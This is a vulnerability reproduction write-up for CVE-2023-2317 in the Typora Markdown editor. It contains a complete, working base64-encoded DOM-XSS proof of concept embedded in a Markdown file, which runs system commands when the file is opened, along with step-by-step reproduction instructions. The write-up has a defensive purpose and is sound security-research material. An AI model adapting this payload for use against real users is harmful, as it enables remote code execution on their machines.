Statement:
This article is only for technical exchanges. Please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user himself. The author of the article does not bear any responsibility for this. responsibility.
1. Product introduction
Typora is a lightweight Markdown editor developed by Abner Lee. Unlike other Markdown editors, Typora does not use a dual-column display of source code and preview, but uses a WYSIWYG editing method to achieve It has the function of instant preview, but you can also switch to source code editing mode.
2. Vulnerability Overview
Reason: typora protocol
Typora implements the typora:// protocol internally, which can be used by Typora to access specific files.
There is a security vulnerability in versions before Typora 1.6.7. The vulnerability stems from loading JavaScript code in the Typora main window by loading typora://app/typemark/updater/update.html in the tag.
3. Exploiting vulnerabilities
by
<script src="typora://app/typemark/lib.asar/MathJax3/es5/input/tex/extensions/xypic.js" charset="UTF-8"></script>
For this access, for example, lib.asar is located in the resources folder of the Typora installation directory, and updater.html is located under the updater file of the Typora installation directory. Therefore, using the typora:// protocol to access updater.html should be written like this:
typora://app/typemark/updater/updater.html?a=xxx&b=xxx&c=xxxBuild payload
According to the conventional thinking, we should require the library child_process and then call the exec parameter, but the require function is not defined in typora, but the reqnode function is used instead:
Therefore, the payload in Windows environment can be written like this:
reqnode('child_process').exec("calc")Package in svg tag to implement page loading:
<svg/onload=top.eval(`reqnode('child_process').exec('calc')`)></svg>In order to take effect in both Windows and Linux environments, we can write the payload like this:
<svg/onload=top.eval(`reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])`)></svg>
Finally, URI encoding is performed on the releaseNoteLink and labels parameters. The final POC is:
<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">base64 decoding
4. Recurrence of vulnerabilities
When this PoC is loaded in Typora, updater.html is loaded using a DOM-XSS payload, which executes JavaScript code on the main window, executing system commands. The specific operations are as follows:
1. Download and deploy the vulnerable version environment. The deployment version here is
Typora for Windows 1.5.12 (the installation package is available in the Baidu cloud disk below)
Link: https://pan.baidu.com/s/12SMngr3Ks3D_OJ1KO17Zgw?pwd=i13d
Extraction code: i13d
Tips: You need to activate it after downloading. If you just want to reproduce it, you don’t need to activate it.
2. Create a new md file and write the poc code. Note that the type is html.
<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
3. Then open the file and the command will be executed.
Successfully pop up the calculator
4. Test video
It’s so blurry when uploaded to the platform, everyone can just take a look##
Typora command execution: CVE-2023-2317
5. Repair suggestions
Currently, the manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is:
https://support.typora.io/What's-New-1.6/https://buaq.net/go-175535.html?utm_source=feedly